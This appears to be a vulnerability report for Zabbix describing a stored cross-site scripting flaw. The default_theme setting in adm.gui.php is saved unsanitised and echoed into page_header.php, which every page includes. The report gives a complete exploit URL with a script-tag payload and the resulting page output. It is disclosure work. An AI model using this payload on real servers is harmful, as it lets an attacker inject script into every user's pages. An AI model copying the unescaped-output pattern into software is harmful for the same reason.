The default_theme is set by an administrative user who has access to adm.gui.php

adm.gui.php:
$configs = array(
'default_theme' => get_request('default_theme'),
...
update_config($configs)

default_theme is not sanitized before being stored in the database

page_header.php:
$css = $config['default_theme'];
<body class="<?php echo $css; ?>">

Example:
http://zabbixserver/zabbix/adm.gui.php?sid=f449c57db01c1234&form_refresh=1&form_refresh=1&default_theme=originalblue">test1234<script>alert("xss")</script>&dropdown_first_entry=1&dropdown_first_remember=1&search_limit=1000&max_in_table=50&event_ack_enable=1&event_expire=7&event_show_max=100&server_check_interval=10&save=Save

(change sid to valid admin sid)

Response:
<body class="originalblue">
test1234
<script>
alert("xss")
</script>
/main.css" />

page_header.php is called in every page

blah@blah:/var/www/zabbix$ grep -i "page_header" ./*
/acknow.php:require_once dirname(_FILE_).'/include/page_header.php';
./actionconf.php:require_once dirname(_FILE_).'/include/page_header.php';
./adm.gui.php:require_once dirname(_FILE_).'/include/page_header.php';
./adm.housekeeper.php:require_once dirname(_FILE_).'/include/page_header.php';
./adm.iconmapping.php:require_once dirname(_FILE_).'/include/page_header.php';
....truncated....

The theme saved is displayed for every user on every page, making this critical.

Thanks

-Lincoln